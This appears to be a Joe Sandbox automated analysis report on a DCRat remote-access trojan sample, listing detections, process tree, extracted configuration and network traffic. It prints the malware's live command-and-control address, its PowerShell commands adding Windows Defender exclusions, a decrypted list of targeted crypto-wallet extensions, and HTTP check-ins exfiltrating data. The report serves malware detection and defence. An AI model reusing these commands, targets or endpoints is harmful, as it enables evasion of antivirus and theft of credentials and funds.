Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zZ1Y43bxxV.exe

Overview

General Information

Sample name:zZ1Y43bxxV.exe
renamed because original name is a hash value
Original sample name:cdac978772a7616686c0efe2727ce902.exe
Analysis ID:1583651
MD5:cdac978772a7616686c0efe2727ce902
SHA1:b316852fe5b1c54c61ffefac1bc9032091d26cb0
SHA256:fcfb73997e95a7b8dfd22e302a1b18f8c7075a127bf33f7c9d8bc203984bcdf6
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
.NET source code contains potential unpacker
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Drops PE files to the user root directory
Drops executable to a common third party application directory
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • zZ1Y43bxxV.exe (PID: 6164 cmdline: "C:\Users\user\Desktop\zZ1Y43bxxV.exe" MD5: CDAC978772A7616686C0EFE2727CE902)
    • powershell.exe (PID: 6036 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2916 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\mozilla maintenance service\logs\StartMenuExperienceHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7612 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 4956 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\UserOOBEBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4192 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1012 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7276 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\QgDfm1tal9.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7360 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7436 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • wnWNWNYIxJtFiUSDRXunzX.exe (PID: 7744 cmdline: "C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe" MD5: CDAC978772A7616686C0EFE2727CE902)
  • svchost.exe (PID: 8164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
zZ1Y43bxxV.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            C:\Users\Public\UserOOBEBroker.exeJoeSecurity_DCRat_1Yara detected DCRatJoe Security

              Memory Dumps

              SourceRuleDescriptionAuthorStrings
              00000000.00000000.1643692191.00000000000D2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000010.00000002.2909009031.000000000308A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000010.00000002.2909009031.00000000033A9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000010.00000002.2909009031.0000000002CE1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      Process Memory Space: zZ1Y43bxxV.exe PID: 6164JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Click to see the 1 entries

                        Unpacked PEs

                        SourceRuleDescriptionAuthorStrings
                        0.0.zZ1Y43bxxV.exe.d0000.0.unpackJoeSecurity_DCRat_1Yara detected DCRatJoe Security

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zZ1Y43bxxV.exe", ParentImage: C:\Users\user\Desktop\zZ1Y43bxxV.exe, ParentProcessId: 6164, ParentProcessName: zZ1Y43bxxV.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', ProcessId: 6036, ProcessName: powershell.exe
                          Sigma detected: Powershell Defender Exclusion
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zZ1Y43bxxV.exe", ParentImage: C:\Users\user\Desktop\zZ1Y43bxxV.exe, ParentProcessId: 6164, ParentProcessName: zZ1Y43bxxV.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', ProcessId: 6036, ProcessName: powershell.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zZ1Y43bxxV.exe", ParentImage: C:\Users\user\Desktop\zZ1Y43bxxV.exe, ParentProcessId: 6164, ParentProcessName: zZ1Y43bxxV.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\autoit3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exe', ProcessId: 6036, ProcessName: powershell.exe
                          Sigma detected: Windows Processes Suspicious Parent Directory
                          Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 8164, ProcessName: svchost.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2025-01-03T09:07:14.471923+010020480951A Network Trojan was detected192.168.2.44973286.110.194.2880TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: zZ1Y43bxxV.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.phpAvira URL Cloud: Label: malware
                          Antivirus detection for dropped file
                          Source: C:\Users\Public\UserOOBEBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\Desktop\GmBsEsrN.logAvira: detection malicious, Label: TR/Agent.jbwuj
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Source: C:\Users\user\AppData\Local\Temp\QgDfm1tal9.batAvira: detection malicious, Label: BAT/Delbat.C
                          Source: C:\Users\user\Desktop\CqMurJJc.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\Users\user\Desktop\ASylWHNt.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                          Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeAvira: detection malicious, Label: HEUR/AGEN.1309961
                          Found malware configuration
                          Source: zZ1Y43bxxV.exeMalware Configuration Extractor: DCRat {"C2 url": "http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "true", "2": "true", "3": "true", "4": "true", "5": "true", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeReversingLabs: Detection: 78%
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exeReversingLabs: Detection: 78%
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeReversingLabs: Detection: 78%
                          Source: C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exeReversingLabs: Detection: 78%
                          Source: C:\Users\Public\UserOOBEBroker.exeReversingLabs: Detection: 78%
                          Source: C:\Users\user\Desktop\ASylWHNt.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\BtlmWJui.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\CqMurJJc.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\CzktcvcZ.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\EBWcxehU.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\EfGUsIxp.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\GmBsEsrN.logReversingLabs: Detection: 50%
                          Source: C:\Users\user\Desktop\HQmkzWIi.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\QMyIEiey.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\UhMZMMnD.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\VDeRaRWG.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\aEoYYxCd.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\bfAYobhs.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\cNtGaFop.logReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\eYPHaYTq.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\fijXRHyU.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\iGWfDlte.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\iOGyhUTj.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\lJFefRJG.logReversingLabs: Detection: 15%
                          Source: C:\Users\user\Desktop\nUbffkpH.logReversingLabs: Detection: 25%
                          Source: C:\Users\user\Desktop\vYOmNlRn.logReversingLabs: Detection: 29%
                          Source: C:\Users\user\Desktop\voDmexRC.logReversingLabs: Detection: 37%
                          Source: C:\Users\user\Desktop\wGHUzQXl.logReversingLabs: Detection: 20%
                          Source: C:\Users\user\Desktop\zeucltSv.logReversingLabs: Detection: 50%
                          Multi AV Scanner detection for submitted file
                          Source: zZ1Y43bxxV.exeVirustotal: Detection: 61%Perma Link
                          Source: zZ1Y43bxxV.exeReversingLabs: Detection: 78%
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\Public\UserOOBEBroker.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\Desktop\FpakjsdS.logJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\StartMenuExperienceHost.exeJoe Sandbox ML: detected
                          Source: C:\Program Files (x86)\AutoIt3\Extras\AutoUpdateIt\wnWNWNYIxJtFiUSDRXunzX.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: zZ1Y43bxxV.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: zZ1Y43bxxV.exeString decryptor: {"0":[],"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"Full path"},"d1159ac1-2243-45e3-9bad-55df4f7732e9":{"_0":"crypto;bank;authorization;account","_1":"15000000","_2":"15","_3":"True"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds","_1":""}}
                          Source: zZ1Y43bxxV.exeString decryptor: ["oASNH1t456EikURI4VE901riUiT0vhqPPdrCyTnZqfd2aBLWCFEPIpvxTu3ih2IYQyTHmOTlroTUYzISW6xqdbHjs4sEaF1xXFmlsEtyvcidWbZelkLlEb5yrtZsfPLl","8f8e651a25a945ecc390a45c0da3cfc0265e5ce1aa467481e904db157d1d950e","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJeElpd2lJaXdpWlhsSmQwbHFiMmxsTVU1YVZURlNSbFJWVWxOVFZscEdabE01Vm1NeVZubGplVGhwVEVOSmVFbHFiMmxrU0VveFdsTkpjMGxxU1dsUGFVb3dZMjVXYkVscGQybE5lVWsyU1c1U2VXUlhWV2xNUTBrd1NXcHZhV1JJU2pGYVUwbHpTV3BWYVU5cFNqQmpibFpzU1dsM2FVNXBTVFpKYmxKNVpGZFZhVXhEU1ROSmFtOXBaRWhLTVZwVFNYTkphbWRwVDJsS01HTnVWbXhKYVhkcFQxTkpOa2x1VW5sa1YxVnBURU5KZUUxRFNUWkpibEo1WkZkVmFVeERTWGhOVTBrMlNXNVNlV1JYVldsTVEwbDRUV2xKTmtsdVVubGtWMVZwVEVOSmVFMTVTVFpKYmxKNVpGZFZhVXhEU1hoT1EwazJTVzVTZVdSWFZXbG1VVDA5SWwwPSJd"]
                          Source: zZ1Y43bxxV.exeString decryptor: [["http://86.110.194.28/Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/","processorWindowsDatalifepublic"]]
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 16_2_00007FFD9BFB367E CryptUnprotectData,16_2_00007FFD9BFB367E
                          Source: zZ1Y43bxxV.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDirectory created: C:\Program Files\Internet Explorer\wnWNWNYIxJtFiUSDRXunzX.exeJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeDirectory created: C:\Program Files\Internet Explorer\a903aeb2e41cb9Jump to behavior
                          Source: zZ1Y43bxxV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.logat source: wnWNWNYIxJtFiUSDRXunzX.exe, 00000010.00000002.2901730818.0000000000F96000.00000004.00000020.00020000.00000000.sdmp
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Users\user\Desktop\zZ1Y43bxxV.exeCode function: 4x nop then jmp 00007FFD9B8BDFC6h0_2_00007FFD9B8BDDAD
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 4x nop then jmp 00007FFD9B8ADFC6h16_2_00007FFD9B8ADDAD
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 4x nop then jmp 00007FFD9BE7C99Bh16_2_00007FFD9BE7C688
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 4x nop then jmp 00007FFD9BFB2B29h16_2_00007FFD9BFB2869
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 4x nop then jmp 00007FFD9BFB2B29h16_2_00007FFD9BFB2A28
                          Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exeCode function: 4x nop then jmp 00007FFD9BFB2B29h16_2_00007FFD9BFB2A38

                          Networking

                          barindex
                          Suricata IDS alerts for network traffic
                          Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49732 -> 86.110.194.28:80
                          Uses ping.exe to check the status of other devices and networks
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                          Source: Joe Sandbox ViewASN Name: RACKTECHRU RACKTECHRU
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 1452Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2568Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2052Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2576Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 86.110.194.28Content-Length: 2052Expect: 100-continue
